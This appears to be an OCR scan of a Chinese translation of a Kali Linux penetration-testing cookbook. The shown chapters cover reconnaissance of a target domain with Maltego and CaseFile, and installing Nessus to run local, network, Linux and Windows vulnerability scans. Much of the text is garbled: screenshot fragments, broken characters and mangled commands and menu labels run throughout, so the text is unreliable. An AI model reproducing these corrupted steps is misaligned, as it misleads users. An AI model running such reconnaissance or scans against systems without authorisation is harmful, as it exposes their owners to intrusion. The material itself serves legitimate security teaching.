
rivacyprotect. or 
targethost.com 5 ? 


+1 225 525 2525 











JS Output - Transform Output Y x 
Teanetore To Entities (NER) EH and OnenCslais] via whois returned with 8 entities. 
Transform To Phone Numbers [using Search Engine] returned with 2 entities. 
Transform To Emails (domain [using Search Engine] returned with 4 entities, 
Using Schema http: //tastools.paterva.com/bfdns/aaastandard,bfdns 
Transform DomainToDNSNameSchema returned with 1 entities. 


10， 我 们 甚至 可 以 通过 在 链接 的 子 节点 上 执行 相同 操作 ， 来 获得 更 多 信息 ， 直 到 我 们 找到 了 
想 要 的 信息 。 


工作 原理 


在 这 个 秘籍 中 ， 我 们 使 用 Maltego 来 映射 网 络 。Maltego 是 一 个 开源 工具 ， 用 于 信息 收集 和 取 
证 ， adde: o 我 们 通过 完成 开始 向 导 来 开始 这 个 秘籍 。 之 后 我 们 使 用 Domain 实体 ， 
通过 将 它 拖 到 我 们 的 图 表 中 。 最 后 ， 我 们 让 Maltego 完 成 我 们 的 图 表 ， 并 且 查 找 各 种 来 源 来 完 


成 任务 。Maltego 十 分 有 用 ， 因 为 我 们 可 以 利用 这 一 自动 化 的 特性 来 快速 收集 目标 信息 ， 例 如 
收集 邮件 地 址 、 服 务 器 的 信息 、 执 行 WHOIS 查 询 ， 以 及 其 它 。 


社区 版 只 允许 我 们 在 信息 收集 中 使 用 75 个 转换 。Maltego 的 完整 版 需要 $650 。 


P 


启用 和 禁用 转换 可 以 通过 Manage 标签 栏 下 方 的 Transform Manager 窗口 设置 : 


x Transform Manager 


All Transforms Transform Sets 四 
n & New Local Transform... 


Transform — Status Location Default set Output 
iv] < AliasToFacebookProfile 


回复 Aasrowitemccomt 
Te Galestotwetervser — 
[iB domainTabNsNameschena — 
[E BomainTasoAlnformation — 
[E BdomainTasrrinformation 
男人 Fewaccourtcetrrent — 
[E @ mirror Emal addresses found — 
AB Mirror External inks found — 
Tm ONetbiockrors 
 Pnetblockronetbiocks — 
ese meta information — 


AliasToFacebookProfile : @ Properties 
“| Description 
; Status 
| Location 
: Default set 
:| Input 
| Output 


Lr 





一 些 转换 首先 需要 接受 才 可 以 使 用 。 


4.8 映射 网 络 


使 用 前 面 几 个 秘籍 获得 的 信息 ， 我 们 就 可 以 创建 该 组 织 网 络 的 蓝图 。 在 这 一 章 的 最 后 一 个 : 秘 
籍 中 ， 我 们 会 了 解 如 何 使 用 Maltego CaseFile 来 可 视 化 地 编译 和 整理 所 获得 的 信息 


CaseFile 就 像 开 发 者 的 网 站 上 那样 ， 相 当 于 不 带 转 换 的 Maltego， 但 拥有 大 量 特 性 。 多 数 特 
性 会 在 这 个 秘籍 的 “操作 步骤 "一 节 中 展示 。 


TEE p 8 


当 我 们 从 启动 CaseFile 来 开始 : 
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1. 3 |" Applications | Kali Linux | Reporting Tools | Evidence Management | casefile 来 


司 动 CaseFile。 


2， 上 点击 CaseFile 应 用 菜单 的 New 来 创建 新 的 图 表 : 


Maltego CaseFile Community 1.0.0 


Open 





Save 


Save All 


Save As 


Save to Server 


Import 


Export 


Print 


More about CaseFile 


E 
"s 
A 
uO 
ug 
a 
2 

















* Exit T Options 445 


[v| Show on Star... RÀ — SUE SNENT DES | 


3， 就 像 Maltego 那 样 ， 我 们 将 每 个 实体 从 Palette 组 建 拖 放 到 图 表 标 签 页 中 。 让 我 们 从 拖 


BL Domain 实体 以 及 修改 Domain Name 属性 来 开始 。 


LTE] © overview 


Hf Detail View 


«no selection 


= Property View 


-=No Properties> 
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Investigate 


EK y 


Paste Clear ^ 
All oe 


|m) Palette | 

& Devices 

& Events 

& Groups 

© Infrastructure 
AS 


An internet Autonoma 


[ e ^ 


Ea DANS Name 


Domain Name System 


ta) Domain 
An internet domain 


IPv4 Address 
An IP version 4 addre: 


ES 
MX Record 
Ba 


A DNS mail exchange 


Be NS Record 


A DNS name server re 


s Netblock 


T An internet Autonome 


— URL 


An internet Uniform R 
Ba Website 
An internet website 


& Locations 


4. & Raintet RO SUR EZ > HAMHER ARAMA 


Investigate 


K qp 


Cut 
Paste Clear ^ 


All 9 Delete 


|u| Palette 

& Devices 

& Events 

& Groups 

$e Infrastructure 
AS 


An internet Autonome 


e 


- DNS Name 
ba 


Domain Name System 


Domain 
An internet domain 


IPv4 Address 


An IP version 4 addres 


MX Record 
A DNS mail exchange 


-NS Record 


A DNS name server re 


Metblock 


An internet Autonome 


us 
— URL 


An internet Uniform R 


Ba Website 


An internet website 


Locations 


Manage 


Manage 


Organize 


Entity 
Selection ss sde £ 


S 


targethost.com 


| MainView | Bubble View | Entity List | 


主 解 。 


Maltega CaseFile Community 1.0.0 


Organize 
se dededs oh 
EU % si 2X 2 3 
Selection ss 4 ^ x 


a 


targethost.com 


This is our starting point 


5. 让 我 们 拖 放 另 一 个 实体 来 记录 目标 的 DNS 信息 : 


E E E Il; Overview 


Hf Detail view 


Domain 


rnaltegao.D ornain 


paterva.co 


A Property View 
© Properties 
Type 

Domain Name targeth...|...| 


WHOIS Info 


© Graph info 
Weight 
Incoming links 


(2 x 





EN E E I Overview 


x 


Hf Detail View 


Domain 


matego Domain 


paterva.co 


A Property View 
© Properties 
Type 

Domain Name targeth... [is] 
WHOIS Info 

© Graph info 

Weight 

Incoming links 


| ex 
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f. 


di 


K 1 .~ Copy 


Cut 
Paste Clear za 


rl 


|m] Palette 
& Devices 
& Events 
& Groups 
© Infrastructure 


@ AS 


An internet Autonoma 


- DNS Name 


Domain Hame System 


Domain 
An internet domain 


IPv4 Address 


An IP version 4 addre: 


MX Record 
A DNS mail exchange 


WS Record 


A DNS name server re 


Netblock 


An internet Autonome 


URL 


An internet Uniform R 


Website 


An internet website 


& Locations 


Paste Clear 


All © Delete 


& Devices 
& Events 
& Groups 
Ò Infrastructure 
, AS 
An internet Autonoma 


= DNS Mame 


Domain Name System 


E 


Domain 
An internet domain 


IPv4 Address 


An IP version 4 addre: 


- MX Record 


A DNS mail exchange 


Bs NS Record 


A DMS name server re 


zi Netblock 


An internet Autonom 


— URL 


An internet Uniform R 


Bs Website 


An internet website 


& Locations 


Manage 


All @ Delete 


Manage 


Maltega 
Organize 
TEHCNCHENTNON 
ty 76959098 3 | 
Selection $$ de /. 9t 7 


| MainView | Bubble View | Entity List 


X 
This is our starting point 


targethost.com 


nslOl.targethost.com 


Maltego CaseFile Community 1.0.0 


Organize 


Entity 
Selection 2$ J, fs 


| MainView | Bubble View | Entity List [st] 


= | 
| This is our starting point | 


| | 








targethost.co 


nsl0l.targethost.com 


需 自 定义 链接 的 属性 : 


Il; Overview 


Ef Detail View 


^ DNS Marne 


x 


MB 5101 targe 


A Property View 
© Properties 
Type 

DHS Name 

© Graph info 
Weight 
Incaming links 
Outgoing links 


Hf Detail view 


Domain 


nslol.t.. 


|»ox 


.加 | 


j matego Domain 
us targethost.c 


= Notes 


This is our starting point 


== Property View 
© Properties 
Type 


Domain Name targeth... 


WHOIS Info 

© Graph info 
Weight 
Incaming links 


[> x 


加 
图 





T/ 


Label | 
show Label |Use Global Setting 7 
Coor | 
Style sod Cid 
Thickness 
Description | 


| |Do not show this dialog again 


8. 重复 步骤 5~7 来 向 图 中 添加 更 多 关于 该 组 织 网 络 的 信息 。 


', Start Page = Ef TargetHost * x | 
Main View | Bubble View | Entity List | Fe 


P i 
Y 
~ t» 


Target Company et 


Q---———-— 


targethost.com 207.143.76.86 















.168.10.20 
nsl01.targethost.com 192.158.10.201 


9， 最 后 我 们 保存 了 信息 图 表 。 图 表 的 记录 可 以 在 之 后 打开 和 编辑 ， 如 果 我 们 需要 的 话 ， 和 
我 们 从 已 知 目标 获得 更 多 信息 的 情况 一 样 。 


工作 原理 
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在 这 个 秘籍 中 ， 我 们 使 用 Maltego CaseFile 来 映射 网 络 。CaseFile 是 个 可 视 化 的 智能 应 用 ， 可 
以 用 于 判断 数 百 个 不 同类 型 信息 之 间 的 关系 和 现实 世界 的 联系 。 它 的 本 质 是 离线 情报 ， 也 就 
是 说 它 是 个 手动 的 过 程 。 我 们 以 启动 CaseFile 并 且 创 建新 的 图 表 作 为 开始 。 接 下 来 ， 我 们 使 
用 了 收集 到 或 已 知 的 目标 网 络 信息 ， 并 且 开 始 向 图 表 中 添加 组 件 来 做 一 些 设置 。 最 后 保存 图 
表 来 结束 这 个 秘籍 。 


P 


我 们 也 可 以 加 密 图 表 记 录 ， 使 它 在 公众 眼 里 更 安全 。 为 了 加 蜜 图 表 ， 需 要 在 保存 的 时 候选 


择 Encrypt (AES-128) 复 选 框 并 提供 一 个 完 码 。 


大 大 = PF sop 

第 五 草 dy ikl vt te 
作者 : Willie L. Pritchett, David De Smet 
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扫描 和 识别 目标 的 漏洞 通常 被 渗透 测试 者 看 做 无 聊 的 任务 之 一 。 但 是 ， 它 也 是 最 重要 的 任务 
之 一 。 这 也 应 该 被 当做 为 你 的 家 庭 作 业 。 就 像 在 学 校 那 样 ， 家 庭 作业 和 和 小 测验 的 设计 目的 是 
让 你 熟练 通过 考试 。 


漏洞 识别 需要 你 做 一 些 作 业 。 你 会 了 解 到 目标 上 什么 漏洞 更 易于 利用 ， 便 于 你 发 送 威力 更 大 
的 攻击 。 本 质 上 ， 如 果 攻 击 者 本 身 就 是 考试 ， 那 么 漏洞 识别 就 是 你 准备 的 机 会 。 


Nessus 和 OpenVAS 都 可 以 扫描 出 目标 上 相似 的 漏洞 。 这 些 漏洞 包括 : 


e Linux 漏洞 

e Windows %7] 
e 本 地 安全 检查 
e 网 络 服务 漏洞 


"AN 
5.1 x ^ i aF k a Nessus 
在 这 个 秘籍 中 ， 我 们 会 安装 、 配 置 和 启动 Nessus。 为 了 在 我 们 所 选 的 目标 上 定位 漏洞 ， 
Nessus 的 漏洞 检测 有 两 种 版 本 : 家 庭 版 和 专业 版 。 


e 家 庭 版 : 家 庭 版 用 于 非 商业 /个 人 用 途 。 以 任何 原因 在 专业 环境 下 适用 Nessus 都 需要 使 
用 专业 版 。 

e 上 人 夜班: 专业 版 用 于 商业 用 途 。 它 包括 文 持 和 额外 特性 ， 例 如 无 线 的 并 发 连接 数 ， 以 及 
其 它 。 如 果 你 是 一 个 顾问 ， 需 要 对 茶 个 客户 执行 测试 ， 专 业 版 就 是 为 你 准备 的 。 


对 于 我 们 的 秘籍 ， 我 们 假定 你 使 用 家 庭 版 。 
准备 
需要 满足 下 列 需求 : 


e 需要 网 络 连接 来 完成 这 个 秘籍 。 
e Nessus 家 庭 版 的 有 效 许 可 证 。 


a 


~ 


ADE 漏洞 评估 


H 


TEE y TK 
让 我 们 开始 安装 、 配 置 和 启动 Nessus ， 首 先 打 开 终 端 窗口 : 


1. 打开 Web àl $% » i5 I] 3X 4 EAE : «http://www. tenable.com/products/nessus/select- 
your-operating-system> ° 


2. He. Fe FR BD A din] ^ Download Nessus Ay T dn 4 选择 Linux 并 且 选 
择 Nessus-5.2.1-debian6_amd64.deb (或 新 版 本 ) © 


Download Nessus 
Please Select Your Operating System 


Microsoft Windows 


e MacOS x 


+ LINUX 





Debian 6.0 (32 bits): 


Nessus-5 7 -debiané 1386. deb 












Pebian 6.0 (64 bits): 
Wwessus-5 2 Fdebianó amd64.deb. 


3， 将 文件 下 载 到 本 地 根 目 录 下 。 





| Name: ly ;Sus-5. 2. E 
V Saweinfolder: | ¢ ‘Earoot | Create Folder 
\ Places || Name wv. Size Modified 

Ql Search Bl Desktop Yesterday at 17:22 


@ Recently Used 


© root | 


国 Desktop 
"4 | 图 File System 


& 


[EL 


Debian package 


下 


4. 打开 终 端 窗口 
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10. 


11. 


执行 下 列 命令 来 安装 Nessus : 


dpkg -i "Nessus-5.2.1-debian6_1386.deb" 


这 个 命令 的 输出 展示 在 下 面 : 


ME E i13Bb5.deb' ` 
ag "nackede nessus 


‘Redding ‘database "e 261864 Tite and directories currently 


Unpacking nessus (from Nessus-5.2.1-deblan6 1386.deb) 
Setting up nessus (5.2.1) 
nessusd (Nessus) 5.2.1 [build N240721] for Linux 


Copyright (C) 1998 2013 Tenable Network Security, Inc 


"rocessing the Nessus plugins... 


本 oem em mn E E HE ] 


ALL plugins Loaded 


- You can start nessusd by typing /etc/init.d/ness 
- [nen go to nttps://k 


Nessus 会 安装 到 /opt/nessus 目录 下 。 


一 旦 安装 好 了 ， 你 就 能 通过 键入 下 列 命令 启动 Nessus : 


/etc/init.d/nessusd start 


installed.) 





J- L pg >» a lb ou WH - 4m E&E o> nn rn 2b sy) app Z7» -— b 38 Al B Z 
l /AZ3Y. F Je A SL 一 ml 9 A^ oss e and 一 | 一 LITI AD ST + BU O AN 2 LJ | XH Lo ~? Lt xfs ^l / > ) 
e UIN 7 < E ] 2 LIN z- —LD I 十 | 十 cl / T TI ALT=? U LIN M V A 人 人 ~ 47 - J ` 1 r! 47 
d i^ J ‘s+ " Ne IS ~~ H 4 J. d A PA = 可/ 站 ^| J (—— /JJ 一 -J Lt By J GAN SYN. An Y I" | i Nd ] A M 
Z ~ 
| | 


通过 执行 下 列 人 命令， 激活 你 的 Nessus : 


/opt/nessus/bin/nessus-fetch --register XXXX-XXXX-XXXX-XXXX- XXXX 


一 步 中 ， 我 们 会 从 http://plugins.nessus.org 获 取 新 的 插件 。 


现在 在 终端 中 键入 下 列 命 


/opt/nessus/sbin/nessus-adduser 


在 登录 提示 框 中 ， 输 入 用 户 的 登录 名 称 。 


输入 两 次 密码 。 


12. 回答 (Yes) ， 将 用 户 设置 为 管理 员 。 

这 一 步 只 需要 在 第 一 次 使 用 时 操作 。 
13， 完 成 后 ， 你 可 以 通过 键入 以 下 命令 来 启动 Nessus (没有 用 户 账户 则 不 能 工作 ) © 
14. 在 https://127.0.0.1:8834 上 登录 Nessus ° 


如 果 你 打算 使 用 Nessus， 要 记得 从 安装 在 你 的 主机 上 ， 或 者 虚拟 机 上 的 kali Linux 
版 本 中 访问 。 原 因 是 ，Nessus 会 基于 所 使 用 的 机 器 来 激活 自己 。 如 果 你 安装 到 优盘 
了 ， 在 每 次 重启 后 你 都 需要 重新 激活 你 的 版 本 。 


在 这 个 秘籍 中 ， 我 们 以 打开 终端 窗口 ， 并 通过 仓库 来 安装 Nessus 开始 。 之 后 我 们 启动 了 
Nessus， 并 为 了 使 用 它 安 装 了 我 们 的 证 书 。 
更 多 


为 了 注册 我 们 的 Nessus 副本 ， 你 必须 拥有 有 效 的 许可 证 ， 它 可 以 从 

tenable. Lee IRI o m EL > Nessus 运行 为 浏览 
器 中 的 Flash， 所 以 首次 启动 程序 时 ， — Firefox 安装 Flash 插件 。 如 果 你 在 使 用 

Flash 时 遇 到 了 问题 ， 访 问 来 获得 信 ， 


5.2 Nessus - 发 现 本 地 漏洞 


现在 我 们 已 经 安装 并 配置 了 Nessus， 我 们 将 要 执行 第 一 次 漏洞 测试 。Nessus 允许 我 们 攻击 
很 多 种 类 的 漏洞 ， 它 们 取决 于 我 们 的 版 本 。 我 们 也 需要 评估 的 目标 漏洞 列表 限制 为 针对 我 们 
想 要 获取 的 信息 类 型 的 漏洞 。 在 这 个 秘籍 中 ， 我 们 将 要 以 发 现 本 地 漏洞 开始 ， 这 些 漏 洞 针 对 
我 们 当前 使 用 的 操作 系统 。 

准备 

为 了 完成 这 个 秘籍 ， 你 将 要 测试 你 的 本 地 系统 (Kali Linux) 。 


操作 冰刀 

让 我 们 开始 使 用 Nessus 来 发 现 本 地 漏洞 ， 首 先 打开 Firefox 3l 5, 25 : 
1. 在 https://127.0.0.1:8834 登录 Nessus ° 
2. Wl?) Policies ° 


3. «at New Policy ° 


NESSUS vunerabi) sconner 


We Peer Omen 





GF General Settings Policy General Settings | 
E 
Setting Tyme Basi -" 
&, 
P ms 
visibility ürteate 
Desoiplian 


Allow Post-Scan Pepan Editing = 


4. 在 General Settings 标签 页 ， 进 行 如 下 操作 : 
i 在 Settings Type 中 选择 Basic ° 


ij， 为 你 的 扫描 输入 一 个 名 称 。 我 们 选择 了 Local vulnerability Assessment ， 但 你 可 以 
选择 想 要 的 其 它 名 称 。 


iii， 有 两 个 可 见 性 的 选择 : 
m Shared : 其它 用 户 可 以 利用 这 次 扫描 。 
m ^ Private | 这 次 扫描 只 能 被 你 使 用 。 
iv， 其 它 项 目 保留 默认 。 
V. Rib Update ° 
5. 在 Plugins 标签 页 中 ， 选 择 Disable All 并 选择 下 列 特定 的 漏洞 : 
l. Ubuntu Local Security Checks ° 


ll. Default Unix Accounts ° 





= Local vulnerability Assessment Wb Fier Options» 





o Policy Plugin Configurations Enable All Disable Al NL 
"1 
AIX Loca Security Check: 10994 
e Flugins 
Y | Barkdaore gu 
, * Brine Torce amaka zB 
OG) abuses 2633 
Cl aburres : RSE E13 
cmo 27 
| Deng Local Secuky Checks 1460 
Gers ra 


6. Aah Update 来 保存 新 的 策略 。 
T. 在 主 菜单 中 ， 上 点击 scan Queue 菜单 选项 。 
8. ah New Scan 按钮 并 进行 如 下 操作 : 


为 你 的 扫描 输入 名 称 。 如 果 你 一 次 运行 多 个 扫描 ， 这 会 非常 有 用 。 这 是 区 分 当前 运 
行 的 不 同 扫描 的 方式 。 


ii， 输 入 扫描 类 型 : 
m Run Now : 默认 开 尼 ， 这 个 选项 会 立即 运行 扫描 。 
m Scehduled : 允许 你 选择 日 期 和 时 间 来 运行 扫描 。 
m Template : 将 扫描 设置 为 模板 。 


iii， 选择 扫描 条 略 。 这 里 ， 我 们 选择 之 前 创建 的 Local vulnerabilities Assessment R 


ak o 
iV. 选择 你 的 目标 ， 包 含 下 列 要 点 : 

" 目标 必须 每 行 输入 一 个 。 

w 你 也 可 以 在 每 行 输入 目标 的 范围 。 
v， 你 也 可 以 上 传 目 标 文件 (如 果 有 的 话 ) 或 选择 add Target IP Address ° 


9， 点 击 Run Scan 


© New Scan Template 





TF General Settings General Scan Settings 
mi | 
Type Fun Hen 
Polity | L ral 山 nerability 总 china ant m 
Scan Targets 





10. 你 会 被 要 求 确认 ， 你 的 测试 将 会 执行 (取决 于 你 选择 了 多 少 目标 ， 以 及 要 执行 乡 少 测 
试 ) 。 


11. 一 旦 完成 了 ， 你 会 收 到 一 份 报告 。 
12. 双击 报告 来 分 析 下 列 要 点 (在 Results 标签 页 中 ) 
o 每 个 发 现 了 漏洞 的 目标 会 被 列 出 。 
o 双击 IP 地 址 来 观察 端口 ， 和 每 个 端口 的 问题 。 
o 点 击 列 下 方 的 数字 ， 来 获得 所 发 现 的 特定 漏洞 的 列表 。 
o 漏洞 会 详细 列 出 。 


13. 点 击 Reports 主 菜单 中 的 Download Report ° 


5.3 Nessus - 发 现 网 络 漏洞 


Nessus 允许 我 们 攻击 很 多 种 类 的 漏洞 ， 它 们 取决 于 我 们 的 版 本 。 我 们 也 需要 评估 的 目标 漏洞 
列表 限制 为 针对 我 们 想 要 获取 的 信息 类 型 的 漏洞 。 这 个 秘籍 中 ， 我 们 会 配置 Nessus KAMA 
标 上 的 网 络 漏洞 。 这 些 漏洞 针对 主机 或 网 络 协议 。 

准备 

为 了 完成 这 个 秘籍 ， 你 需要 被 测试 的 虚拟 机 。 


e Windows XP 
e Windows 7 


e Metasploltable 2.0 
e 网 络 防 火 墙 或 路 由 
e 任何 其 它 Linux 版 本 


操作 步骤 


让 我 们 开始 使 用 Nessus 来 发 现 本 地 漏洞 ， 首 先 打 开 Firefox 浏览 器 : 
1. 在 https://127.0.0.1:8834 登录 Nessus ° 


2. 访问 Policies ° 


3. at Add Policy ° 











Se Filer Options 





LF Genaral Settings Policy General Settings 
= Hg 
Setting Type Basic = 
~ 
+ PAE 
VESIE private - 
Description 


ABW Past-5can Feport Editim] — 





4. 在 General 标签 页 ， 进 行 如 下 操作 : 


i 为 你 的 打 描 输入 一 个 名 称 。 我 们 选择 了 Internal Network Scan ? 但 你 可 以 选择 想 要 
的 其 它 名 称 。 


ii 有 两 个 可 见 性 的 选择 : 
B shared : 其 它 用 户 可 以 利用 这 次 扫描 。 
m Private : 这 次 扫描 只 能 被 你 使 用 。 

iii. 其它 项 目 保 留 默 认 。 


iv. Ait Update ° 


-Je 


5. 在 Plugins 标签 页 中 ， 点 击 Disable all 并 选择 下 列 特定 的 漏洞 : 


O CISCO 

O DNS 

o Default Unix Accounts 
O FTP 

O Firewalls 

o Gain a shell remotely 
O General 

O Netware 

O  Peer-To-Peer File Sharing 
O Policy Compliance 

O Port Scanners 

O SCADA 

O SMTP Problems 

O SNMP 


O Service Detection 


O Settings 





z EZ 5 

ama " 

Em SMTP problems 130 

ee Plugins SAMP 29 

^K ; 

E ET Linur Loca Securmy Cneckz 1445 
Service detection 384 


clarke Loca Senky Checks 608 
powi Loca Security Checks JZBl 
SUSE Local Sercurmy Checks 5131 
Lbumu Local Security Checks PaPa] 
Viewer ESE Local Sacurky Chicks TU 
Soroll 
We Web Server FES 


6. Aah Update 来 保存 新 的 策略 。 
T. 在 主 菜单 中 ， 上 点击 scan Queue 菜单 选项 。 


8， 点 击 New Scan 按钮 并 进行 如 下 操作 : 


Pa 
xi 
am 
us 
(5 


L 为 你 的 扫描 输入 名 称 。 如 果 你 一 次 运行 多 个 扫描 ， 这 会 非常 有 用 。 这 
行 的 不 同 扫描 的 方式 。 


i 输入 扫描 类 型 : 


M Run Now : 默认 开 尼 ， 这 个 选项 会 立即 运行 打 描 。 


m Scehduled : 允许 你 选择 日 期 和 时 间 来 运行 扫描 。 
m Template : 将 扫描 设置 为 模板 。 
iii. 选择 扫描 策略 。 这 里 ， 我 们 选择 之 前 创建 的 Internal Network Scan R% ° 
选择 你 的 目标 ， 包 含 下 列 要 点 
m 目标 必须 每 行 输入 一 个 。 
m 你 也 可 以 在 每 行 输入 目标 的 范 
， 你 也 可 以 上 传 目标 文件 (如果 有 的 话 ) 或 选择 Add Target IP Address ° 


O. 点击 Run Scan 


© New Scan Template 





E General Settings General Scan Settings 
D, 
Hame Internal Network Scan 
Time Run aw e 
Policy External Network Scan - 


scan Targets 


Upload Targets | | 已 Fas 天 





你 会 被 要 求 确 认 ， 你 的 测试 将 会 执行 《取决 于 你 选择 了 多 少 目 标 ， 以 及 要 执行 多 少 测 
R) 。 


Nessus’ wir 


E Scan Queue 


Created Ey 


mieria Hepseork Scal raa June 26, 20132310 58 ra = 





11. 一 旦 完成 了 ， 你 会 收 到 一 份 报告 ， 它 在 Results 标签 页 中 。 


12. 双击 报告 来 分 析 下 列 要 点 (在 Results 标签 页 中 ) 
o 每 个 发 现 了 漏洞 的 目标 会 被 列 出 。 
o 双击 IP 地 址 来 观察 端口 ， 和 每 个 端口 的 问题 。 
o 点 击 列 下 方 的 数字 ， 来 获得 所 发 现 的 特定 问题 /漏洞 的 列表 。 
o 漏洞 会 详细 列 出 。 


13. 点 击 Reports 主 菜单 中 的 Download Report ° 


5.4 发 现 Linux 特定 漏洞 

在 这 个 秘籍 中 ， 我 们 会 使 用 Nessus 探索 如 何 发 现 Linux 特定 漏洞 。 这 些 漏洞 针对 网 络 上 运行 
Linux 的 主机 。 

准备 

为 了 完成 这 个 秘籍 ， 你 需要 被 测试 的 庶 拟 机 : 


e Metasploltable 2.0 
e 其 它 Linux 版 本 


操作 步骤 

让 我 们 开始 使 用 Nessus 来 发 现 Linux 特定 漏洞 ， 首 先 打 开 Firefox 浏览 器 : 
1. 在 https://127.0.0.1:8834 登录 Nessus 。 
2. Wl?) Policies ° 


3. at Add Policy ° 


Ness US vulnerability scanner 


L3 Filter Cpaone . 





Q) General Settings Policy General Settings 
A 

5efung Woe Basit 
& i 
A” Hamne 

Ws lib EU 
Destination 
Allow Pazst-Scan Repin Editing — 


Update Gamal 





4. 在 General Settings 标签 页 ， 进 行 如 下 操作 : 


L 为 你 的 扫描 输入 一 个 名 称 。 我 们 选择 了 Linux vulnerability Scan ， 但 你 可 以 选择 想 
要 的 其 它 名 称 。 


ii、 有 两 个 可 见 性 的 选择 : 
= Shared : 其 它 用 户 可 以 利用 这 次 扫描 。 
WB Private : 这 次 扫描 只 能 被 你 使 用 。 

iii. JL E TRE SR o 


5. 在 Plugins 标签 页 中 ， 点 击 Disable All 并 选择 下 列 特定 的 漏洞 。 当 我 们 扫描 可 能 在 我 们 
的 Linux 目标 上 运行 的 服务 时 ， 这 份 列表 会 变 得 很 长 : 


o Backdoors 

O Brute Force Attacks 

O CentOS Local Security Checks 
O DNS 

O Debian Local Security Checks 
o Default Unix Accounts 

O Denial of Service 

O FTP 

O Fedora Local Security Checks 
O Firewalls 

O FreeBSD Local Security Checks 


o Gain a shell remotely 


O General 

O Gentoo Local Security Checks 

O HP-UX Local Security Checks 

oO Mandriva Local Security Checks 
O Misc 

O Port Scanners 

O Red Hat Local Security Checks 

O SMTP Problems 

O SNMP 

O Scientific Linux Local Security Checks 
oO Slackware Local Security Checks 
oO Solaris Local Security Checks 

O SuSE Local Security Checks 

oO Ubuntu Local Security Checks 


O Web Servers 


Slackware Local Securnry Checks 
ilis 3 LE 
Solaris Local Secury Checks 


Ls Plugins 
SLE Loca Securdy Checks 


bS 
P — 
Ubunh Loca Secun Crick: 


Vkiware ESS Local Securtty Checks 


Wr 





Windows | htcrssof Buktina 


Windows | Lser management 


LI padais Canc 





e nnd 


点 击 Update 来 保存 新 的 策略 P 


T. 4E XOOÉCP > BH scan Queue 菜单 选项 。 


A 3: New Scan 按钮 并 进行 如 下 操作 : 


为 你 的 扫描 输入 名 称 。 如 果 你 一 次 运行 多 个 扫描 


行 的 不 同 扫描 的 方式 。 


i 输入 扫描 类 型 : 


M Run Now : 默认 开 尼 ， 这 个 选项 会 立即 运行 扫 


508 


5111 


414 


, 这 会 非常 有 用 。 这 是 区 分 当前 运 


m Scehduled : 允许 你 选择 日 期 和 时 间 来 运行 扫描 。 
m Template : 将 扫描 设置 为 模板 。 
ij， 选择 扫描 策略 。 这 里 ， 我 们 选择 之 前 创建 的 Linux vulnerabilities Scan R% ° 
选择 你 的 目标 ， 包 含 下 列 要 点 : 
" 目标 必须 每 行 输入 一 个 。 
你 也 可 以 在 每 行 输入 目标 的 范围 。 
m 上 传 目标 文件 (如 果 有 的 话 ) 或 选择 Add Target IP Address ° 


9O. 点击 Launch Scan 


O New Scan Template 





EË General Settings General Scan Settings 
wi 
Hame 
sca aa 
Poly | Extemal Network Scan 


Scan Tarpebs 


aloamd Target | Bir 


10， 你 会 被 要 求 确认 ， 你 的 测试 将 会 执行 (取决 于 你 选择 了 多 少 目 标 ， 以 及 要 执行 多 少 测 
试 ) 。 
11. 一 旦 完成 了 ， 你 会 收 到 一 份 报告 ， 它 在 Reports 标签 页 中 。 
12. 双击 报告 来 分 析 下 列 要 点 
o 每 个 发 现 了 漏洞 的 目标 会 被 列 出 。 
o 双击 P 地 址 来 观 紧 端口 ， 和 每 个 端口 的 问题 。 
o 点 击 列 下 方 的 数字 ， 来 获得 所 发 现 的 特定 问题 /漏洞 的 列表 。 
o 漏洞 会 详细 列 出 。 


13. 点 击 Reports 主 菜单 中 的 Download Report ° 


5.5 Nessus - 发 现 Windows 特定 的 漏洞 


在 这 个 秘籍 中 ， 我 们 会 使 用 Nessus 探索 如 何 发 现 Windows 特定 漏洞 。 这 些 漏洞 针对 网 络 上 
运行 Windows 的 主机 。 


准备 


为 了 完成 秘籍 ， 你 需要 被 测试 的 庶 拟 机 : 


ox 


e Windows XP 
e Windows 7 


Te TE iy HE 

让 我 们 开始 使 用 Nessus 发 现 Windows 特定 的 漏洞 ， 首 先 打开 Firefox i] 3 8 : 
1. 在 https://127.0.0.1:8834 登录 Nessus ° 
2. Wl?) Policies ° 


3. “at Add Policy ° 


NESSUS vunerobiity scanne 


Pond at j=" 


. Piter Options 





Q General Settings Policy General Settings 
rf 
Setting Type Basic 
4% 
A Name 
viaihilihy private 
Dasrnptior 


Allow Post-5ran Pepart Editing i 





4. 在 General Settings 4% $ 进行 如 下 操作 : 


i. 为 你 的 扫描 输入 一 个 名 称 。 我 们 选择 了 windows Vulnerability Scan ， 但 你 可 以 选择 
想 要 的 其 它 名 称 。 


i 有 两 个 可 见 性 的 选择 : 


IV. 


: 其 它 用 户 可 以 利用 这 次 扫描 。 


B Shared 


m Private : 这 次 扫描 只 能 被 你 使 用 。 


其 它 项 目 保留 默认 。 


点 击 Submit ° 


在 Plugins 标签 页 中 ， 点 击 Disable All 并 选择 下 列 特定 的 漏洞 。 它 们 可 能 出 现在 
Windows 系统 中 : 


O 


O 


O 






DNS Databases 

Denial of Service 

FTP 

SMTP Problems 

SNMP Settings 

Web Servers 

Windows 

Windows: Microsoft Bulletins 


Windows: User management 


ph Preece Lini 
E —- 
diewe Loca Securiny Checks 
Soltis Local Securry Checks 
SuSE Local S«ecuriy Checks 
Ubuntu Local Security Checks 


Vihas ESH Lead Geci iy Chika 


| aa | iab Sewers 

Birks 

0g Windows | Micci Blt 
mae Lire managemerni 


Uns ance 


Ee rel 
n 


Ad: submit 来 保存 新 的 策略 。 


在 主 菜单 中 ， 点 击 scan 菜单 选项 。 


点 击 Add Scan 按钮 并 进行 如 下 操作 : 


为 你 的 扫描 输入 名 称 。 如 果 你 一 次 运行 多 个 扫 
行 的 不 同 扫描 的 方式 。 


输入 扫描 类 型 : 








9. 


10. 


11. 


12. 


B Run Now : 默认 开 尼 ， 这 个 选项 会 立即 运行 打 描 。 


m Scehduled : 允许 你 选择 日 期 和 时 间 来 运行 扫描 。 


= Template : 将 扫描 设置 为 模板 。 


ii， 选 择 扫描 策略 。 这 里 ， 


我 们 选 先 择 之 ATAI | 建 的 Windows Vulnerabilities Scan 策略 。 


选择 你 的 目标 ， 包 含 下 列 要 点 : 


m 目标 必须 每 行 输入 


m 你 也 可 以 在 每 行 输 


一 个 。 


入 目标 的 范围 。 


m 上 传 目 标 文件 (如 果 有 的 话 ) 或 选择 Add Target IP Address ° 


点 击 Launch Scan 





























o New Scan Template 


LF General Settings General Scan Settings 
= 
Marne 
Type Pun ow - 
Policy External Network Scan - 
Scan Targets 


